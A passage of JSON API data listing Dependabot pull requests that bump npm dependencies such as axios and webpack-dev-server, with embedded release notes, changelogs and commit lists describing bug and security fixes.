href=\"https://github.com/TanStack/query/commits/@tanstack/react-query@5.100.13/packages/react-query\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `axios` from 1.15.2 to 1.16.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/axios/axios/releases\"\u003eaxios's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.16.1 — May 13, 2026\u003c/h2\u003e\n\u003cp\u003eThis release ships a defence-in-depth fix for prototype pollution in \u003ccode\u003eformDataToJSON\u003c/code\u003e, hardens proxy and CI workflows, restores Webpack 4 compatibility for the fetch adapter, and includes several small bug fixes and maintenance improvements.\u003c/p\u003e\n\u003ch2\u003e🔒 Security Fixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ePrototype Pollution Defence-in-Depth:\u003c/strong\u003e Hardened \u003ccode\u003eformDataToJSON\u003c/code\u003e against already-polluted \u003ccode\u003eObject.prototype\u003c/code\u003e by walking own properties only, so attacker-controlled keys inherited from a poisoned prototype cannot propagate through deserialization. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/7413\"\u003e#7413\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eProxy Cleartext Leak:\u003c/strong\u003e Fixed an issue where HTTPS request data could be transmitted in cleartext to an HTTP proxy under certain configurations. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10858\"\u003e#10858\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eCI Cache Removal:\u003c/strong\u003e Removed all GitHub Actions caches as a defence-in-depth measure against cache poisoning vectors in the build pipeline. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10882\"\u003e#10882\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🐛 Bug Fixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eData URI Parsing:\u003c/strong\u003e Updated the \u003ccode\u003efromDataURI\u003c/code\u003e regex to match RFC 2397 more strictly, fixing edge cases in \u003ccode\u003edata:\u003c/code\u003e URL handling. (\u003cstrong\u003e\u003ca h...\n\n_Description has been truncated_","html_url":"https://github.com/navikt/k9-los-web/pull/4268","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/navikt%2Fk9-los-web/issues/4268","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/4268/packages"}},{"old_version":"5.2.1","new_version":"5.2.4","update_type":"patch","path":null,"pr_created_at":"2026-05-29T20:57:17.000Z","version_change":"5.2.1 → 5.2.4","issue":{"uuid":"4551583254","node_id":"PR_kwDOKRyrU87gze5v","number":31,"state":"closed","title":"chore(deps): bump the npm_and_yarn group across 2 directories with 9 updates","user":"dependabot[bot]","labels":["dependencies","javascript"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":"2026-05-30T23:52:11.000Z","author_association":null,"state_reason":null,"created_at":"2026-05-29T20:57:17.000Z","updated_at":"2026-05-30T23:52:13.000Z","time_to_close":96894,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"chore(deps): bump","group_name":"npm_and_yarn","update_count":9,"packages":[{"name":"webpack-dev-server","old_version":"5.2.1","new_version":"5.2.4","repository_url":"https://github.com/webpack/webpack-dev-server"},{"name":"axios","old_version":"0.30.2","new_version":"0.32.0","repository_url":"https://github.com/axios/axios"},{"name":"@babel/plugin-transform-modules-systemjs","old_version":"7.16.5","new_version":"7.29.7","repository_url":"https://github.com/babel/babel"},{"name":"fast-uri","old_version":"3.1.0","new_version":"3.1.2","repository_url":"https://github.com/fastify/fast-uri"},{"name":"follow-redirects","old_version":"1.15.11","new_version":"1.16.0","repository_url":"https://github.com/follow-redirects/follow-redirects"},{"name":"handlebars","old_version":"4.7.7","new_version":"4.7.9","repository_url":"https://github.com/handlebars-lang/handlebars.js"},{"name":"immutable","old_version":"4.0.0","new_version":"4.1.0","repository_url":"https://github.com/immutable-js/immutable-js"},{"name":"protobufjs","old_version":"7.5.4","new_version":"7.6.1","repository_url":"https://github.com/protobufjs/protobuf.js"},{"name":"socket.io-parser","old_version":"4.2.4","new_version":"4.2.6","repository_url":"https://github.com/socketio/socket.io"}],"path":null,"ecosystem":"npm"},"body":"Bumps the npm_and_yarn group with 9 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [webpack-dev-server](https://github.com/webpack/webpack-dev-server) | `5.2.1` | `5.2.4` |\n| [axios](https://github.com/axios/axios) | `0.30.2` | `0.32.0` |\n| [@babel/plugin-transform-modules-systemjs](https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs) | `7.16.5` | `7.29.7` |\n| [fast-uri](https://github.com/fastify/fast-uri) | `3.1.0` | `3.1.2` |\n| [follow-redirects](https://github.com/follow-redirects/follow-redirects) | `1.15.11` | `1.16.0` |\n| [handlebars](https://github.com/handlebars-lang/handlebars.js) | `4.7.7` | `4.7.9` |\n| [immutable](https://github.com/immutable-js/immutable-js) | `4.0.0` | `4.1.0` |\n| [protobufjs](https://github.com/protobufjs/protobuf.js) | `7.5.4` | `7.6.1` |\n| [socket.io-parser](https://github.com/socketio/socket.io) | `4.2.4` | `4.2.6` |\n\nBumps the npm_and_yarn group with 1 update in the /packages/web directory: [axios](https://github.com/axios/axios).\n\nUpdates `webpack-dev-server` from 5.2.1 to 5.2.4\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack-dev-server/releases\"\u003ewebpack-dev-server's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.2.4\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.3...v5.2.4\"\u003e5.2.4\u003c/a\u003e (2026-05-11)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eset Cross-Origin-Resource-Policy header to prevent source code theft over HTTP\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.2.3\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.2...v5.2.3\"\u003e5.2.3\u003c/a\u003e (2026-01-12)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd \u003ccode\u003ecause\u003c/code\u003e for \u003ccode\u003eerrorObject\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5518\"\u003e#5518\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/37b033da2c48335178495a1987c469a26ef3de60\"\u003e37b033d\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ecompatibility with event target and universal target and lazy compilation  (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/574026c44b9c51f0bbd2f5a2836c54607289a071\"\u003e574026c\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eoverlay:\u003c/strong\u003e add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003ef91baa8\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eprogress indicator styles (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5557\"\u003e#5557\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/41a53a1accdb0a90785d82cbe8a079794eeed3c8\"\u003e41a53a1\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eupgrade selfsigned to v5\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.2.2\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.1...v5.2.2\"\u003e5.2.2\u003c/a\u003e (2025-06-03)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u0026quot;Overlay enabled\u0026quot; false positive (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/18e72ee3e57a6e7598a6c068c0ff7c7bb6a857f1\"\u003e18e72ee\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edo not crush when error is null for runtime errors (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5447\"\u003e#5447\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/309991f947baa0354140b9930a9654ac792e20c4\"\u003e309991f\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eremove unnecessary header \u003ccode\u003eX_TEST\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5451\"\u003e#5451\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/64a6124bf1b4d158bb42a4341dd03121ae3759fa\"\u003e64a6124\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003erespect the \u003ccode\u003eallowedHosts\u003c/code\u003e option for cross-origin header check (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5510\"\u003e#5510\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/03d12141bf7be09dfb14e91e5c834ee63bd9a9a2\"\u003e03d1214\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack-dev-server/blob/main/CHANGELOG.md\"\u003ewebpack-dev-server's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.3...v5.2.4\"\u003e5.2.4\u003c/a\u003e (2026-05-11)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eset Cross-Origin-Resource-Policy header to prevent source code theft over HTTP\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.2...v5.2.3\"\u003e5.2.3\u003c/a\u003e (2026-01-12)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd \u003ccode\u003ecause\u003c/code\u003e for \u003ccode\u003eerrorObject\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5518\"\u003e#5518\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/37b033da2c48335178495a1987c469a26ef3de60\"\u003e37b033d\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ecompatibility with event target and universal target and lazy compilation  (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/574026c44b9c51f0bbd2f5a2836c54607289a071\"\u003e574026c\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eoverlay:\u003c/strong\u003e add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003ef91baa8\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eprogress indicator styles (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5557\"\u003e#5557\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/41a53a1accdb0a90785d82cbe8a079794eeed3c8\"\u003e41a53a1\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eupgrade selfsigned to v5\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.1...v5.2.2\"\u003e5.2.2\u003c/a\u003e (2025-06-03)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u0026quot;Overlay enabled\u0026quot; false positive (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/18e72ee3e57a6e7598a6c068c0ff7c7bb6a857f1\"\u003e18e72ee\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edo not crush when error is null for runtime errors (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5447\"\u003e#5447\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/309991f947baa0354140b9930a9654ac792e20c4\"\u003e309991f\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eremove unnecessary header \u003ccode\u003eX_TEST\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5451\"\u003e#5451\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/64a6124bf1b4d158bb42a4341dd03121ae3759fa\"\u003e64a6124\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003erespect the \u003ccode\u003eallowedHosts\u003c/code\u003e option for cross-origin header check (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5510\"\u003e#5510\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/03d12141bf7be09dfb14e91e5c834ee63bd9a9a2\"\u003e03d1214\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/fd401308f1cc026262880e2dab810004d6444282\"\u003e\u003ccode\u003efd40130\u003c/code\u003e\u003c/a\u003e chore(release): 5.2.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/ece4f3617bea31fb6d3833f69a32b6c289959a49\"\u003e\u003ccode\u003eece4f36\u003c/code\u003e\u003c/a\u003e chore: update deps (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5661\"\u003e#5661\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/a2161442a314a06a97e25d1404d08410cb4e9c51\"\u003e\u003ccode\u003ea216144\u003c/code\u003e\u003c/a\u003e ci: fix test (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5658\"\u003e#5658\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/df073c53a8cefb54210b43813fa6ee60364a554e\"\u003e\u003ccode\u003edf073c5\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/b550a702bd4246d1724513b70de0bfbe6604672f\"\u003e\u003ccode\u003eb550a70\u003c/code\u003e\u003c/a\u003e chore(release): 5.2.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/9704dc52e3f696ae1446428c25882745e9b65cbb\"\u003e\u003ccode\u003e9704dc5\u003c/code\u003e\u003c/a\u003e chore: upgrade selfsigned to v5 and remove node-forge dependency (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5618\"\u003e#5618\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/92bf644784741e8ea5adaa4a1dc26f4d462f223d\"\u003e\u003ccode\u003e92bf644\u003c/code\u003e\u003c/a\u003e chore: bump express to update qs (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5621\"\u003e#5621\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/792b2f0bd13a3b93abf701fe3a5cf41ee16722f4\"\u003e\u003ccode\u003e792b2f0\u003c/code\u003e\u003c/a\u003e chore(deps-dev): bump the dependencies group with 4 updates (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5606\"\u003e#5606\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/6d587cab3e023675de2feedf81bcdfcec7d5b774\"\u003e\u003ccode\u003e6d587ca\u003c/code\u003e\u003c/a\u003e chore(deps): bump the dependencies group across 1 directory with 27 updates (...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003e\u003ccode\u003ef91baa8\u003c/code\u003e\u003c/a\u003e fix(overlay): add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.1...v5.2.4\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `axios` from 0.30.2 to 0.32.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/axios/axios/releases\"\u003eaxios's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.32.0 — May 4, 2026\u003c/h2\u003e\n\u003cp\u003eThis release backports a comprehensive set of security and hardening fixes from the v1.x branch into v0.x, covering prototype-pollution protections, default error redaction, stricter proxy/cookie/socket handling, and one breaking change to merged config and header object prototypes.\u003c/p\u003e\n\u003ch2\u003e⚠️ Breaking Changes \u0026amp; Deprecations\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eNull-prototype merged objects: mergeConfig and header merging now return objects with a null prototype to block prototype-pollution gadgets. Consumers must use Object.prototype.hasOwnProperty.call(obj, key) and avoid implicit string coercion against merged config or header objects. (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10838\"\u003e#10838\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🔒 Security Fixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDefault error redaction: AxiosError.toJSON() now redacts sensitive keys by default to prevent credential leaks in logs. The behavior is configurable via config.redact, with defaults exposed on defaults.redact. (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10838\"\u003e#10838\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eCookie \u0026amp; XSRF handling: Cookie names are read literally rather than via regex, and only own properties are respected when evaluating withXSRFToken. (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10838\"\u003e#10838\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eProxy bypass IPv6 parity: NO_PROXY matching now handles canonical IPv4-mapped IPv6 forms such as ::ffff:127.0.0.1 and ::ffff:7f00:1. (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10838\"\u003e#10838\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eNode http adapter hardening: Strips Proxy-Authorization when no proxy is in use and gates socketPath behind a new allowedSocketPaths allowlist (string or array, normalized) to reduce accidental Unix socket exposure. (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10838\"\u003e#10838\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eBrowser xhr adapter: Stricter own-property checks when reading config and headers. (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10838\"\u003e#10838\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eURL parameters: AxiosURLSearchParams keeps %00 encoded and applies consistent encoding throughout. (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10838\"\u003e#10838\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ePublic type surface: Adds formDataHeaderPolicy, redact, and allowedSocketPaths to the TypeScript declarations alongside their runtime defaults. (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10838\"\u003e#10838\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🔧 Maintenance \u0026amp; Chores\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eRepo hygiene: Updates README.md and CHANGELOG.md, adds AGENTS.md, and refreshes the issue and PR templates. (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10838\"\u003e#10838\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/axios/axios/compare/v0.31.1...v0.32.0\"\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev0.31.1\u003c/h2\u003e\n\u003cp\u003eThis release backports a broad set of security hardenings from the v1 line — covering prototype-pollution defences, stream size enforcement, XSRF handling, URL null-byte encoding, and bounded FormData recursion — and drops committed \u003ccode\u003edist/\u003c/code\u003e artefacts along with Bower support.\u003c/p\u003e\n\u003ch2\u003e⚠️ Breaking Changes \u0026amp; Deprecations\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eBower \u0026amp; Committed \u003ccode\u003edist/\u003c/code\u003e Removed:\u003c/strong\u003e \u003ccode\u003edist/\u003c/code\u003e bundles are no longer committed to the repo, and \u003ccode\u003ebower.json\u003c/code\u003e plus the Grunt \u003ccode\u003epackage2bower\u003c/code\u003e task have been removed. CI still builds bundles before publish, so npm/yarn/pnpm consumers are unaffected; installs via Bower or directly from the git tree must migrate to npm or a CDN. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10747\"\u003e#10747\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🔒 Security Fixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ePrototype Pollution in Header Merge (GHSA-6chq-wfr3-2hj9):\u003c/strong\u003e Tightened \u003ccode\u003eisFormData\u003c/code\u003e to reject plain/null-prototype objects and require \u003ccode\u003eappend\u003c/code\u003e, and guarded the Node HTTP adapter so \u003ccode\u003edata.getHeaders()\u003c/code\u003e is only merged when it is not inherited from \u003ccode\u003eObject.prototype\u003c/code\u003e. Blocks injected headers via polluted \u003ccode\u003egetHeaders\u003c/code\u003e. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10750\"\u003e#10750\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ePrototype Pollution in Config Merging (GHSA-pf86-5x62-jrwf):\u003c/strong\u003e \u003ccode\u003emergeConfig\u003c/code\u003e, defaults resolution, and the HTTP adapter now uses own-property checks for \u003ccode\u003etransport\u003c/code\u003e, \u003ccode\u003eenv\u003c/code\u003e, \u003ccode\u003eBlob\u003c/code\u003e, \u003ccode\u003eformSerializer\u003c/code\u003e, and transforms arrays, and merged configs are returned as null-prototype objects. Prevents hijacking of the request flow through polluted prototypes. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10752\"\u003e#10752\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eFormData / Params Recursion DoS:\u003c/strong\u003e Added a configurable \u003ccode\u003emaxDepth\u003c/code\u003e (default \u003ccode\u003e100\u003c/code\u003e, \u003ccode\u003eInfinity\u003c/code\u003e disables) to \u003ccode\u003etoFormData\u003c/code\u003e and params serialisation, throwing \u003ccode\u003eAxiosError\u003c/code\u003e with code \u003ccode\u003eERR_FORM_DATA_DEPTH_EXCEEDED\u003c/code\u003e when exceeded. Circular-reference detection is preserved. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10728\"\u003e#10728\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eNull-Byte Injection in Query Strings:\u003c/strong\u003e Removed the unsafe \u003ccode\u003e%00\u003c/code\u003e → null-byte substitution from \u003ccode\u003eAxiosURLSearchParams.encode\u003c/code\u003e so \u003ccode\u003e%00\u003c/code\u003e is preserved as-is. Other encoding behaviour (including \u003ccode\u003e%20\u003c/code\u003e → \u003ccode\u003e+\u003c/code\u003e) unchanged. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10737\"\u003e#10737\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eConsolidated v1 Security Backport:\u003c/strong\u003e Rolls up remaining v1 hardenings into \u003ccode\u003ev0.x\u003c/code\u003e: \u003ccode\u003emaxContentLength\u003c/code\u003e enforcement for \u003ccode\u003eresponseType: 'stream'\u003c/code\u003e via a guarded transform with deferred piping, \u003ccode\u003emaxBodyLength\u003c/code\u003e enforcement for streamed uploads on native \u003ccode\u003ehttp\u003c/code\u003e/\u003ccode\u003ehttps\u003c/code\u003e with \u003ccode\u003emaxRedirects: 0\u003c/code\u003e, and stricter \u003ccode\u003ewithXSRFToken\u003c/code\u003e handling so only own boolean \u003ccode\u003etrue\u003c/code\u003e enables cross-origin XSRF headers. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10764\"\u003e#10764\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🔧 Maintenance \u0026amp; Chores\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eCODEOWNERS:\u003c/strong\u003e Added \u003ccode\u003e.github/CODEOWNERS\u003c/code\u003e with \u003ccode\u003e* @jasonsaayman\u003c/code\u003e to set a default reviewer for all paths. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10740\"\u003e#10740\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/axios/axios/compare/v0.31.0...v0.31.1\"\u003eFull Changelog\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev0.31.0\u003c/h2\u003e\n\u003cp\u003eThis release backports security fixes from v1.x, hardens the CI/CD supply chain with OIDC publishing and \u003ccode\u003ezizmor\u003c/code\u003e scanning, resolves TypeScript typing issues in \u003ccode\u003eAxiosInstance\u003c/code\u003e, and fixes a performance regression in \u003ccode\u003eisEmptyObject()\u003c/code\u003e.\u003c/p\u003e\n\u003ch2\u003e🔒 Security Fixes\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/8db2d44896849a21ed9721185b1034df24e1ba7b\"\u003e\u003ccode\u003e8db2d44\u003c/code\u003e\u003c/a\u003e chore: bump version to v0.32.0 (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10840\"\u003e#10840\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/2af6116a957b1dd1b32056181326da8a5540d3bc\"\u003e\u003ccode\u003e2af6116\u003c/code\u003e\u003c/a\u003e chore: backport fixes from the v1x branch (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10838\"\u003e#10838\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/a589dc525af12e0fabef7d6e5be028ad433eee31\"\u003e\u003ccode\u003ea589dc5\u003c/code\u003e\u003c/a\u003e chore: bump version to v0.31.1 (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10766\"\u003e#10766\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/b0c632f36a5ea2e73c9bdf3a54164a8ede925736\"\u003e\u003ccode\u003eb0c632f\u003c/code\u003e\u003c/a\u003e fix: backport security issues (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10764\"\u003e#10764\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/b52187f4571b6b8663fed5904e3082ab30660364\"\u003e\u003ccode\u003eb52187f\u003c/code\u003e\u003c/a\u003e fix: harden config merging (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10752\"\u003e#10752\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/e3ddeb40f6a142a234925341151e2ca631a6de64\"\u003e\u003ccode\u003ee3ddeb4\u003c/code\u003e\u003c/a\u003e fix: header security issues (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10750\"\u003e#10750\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca 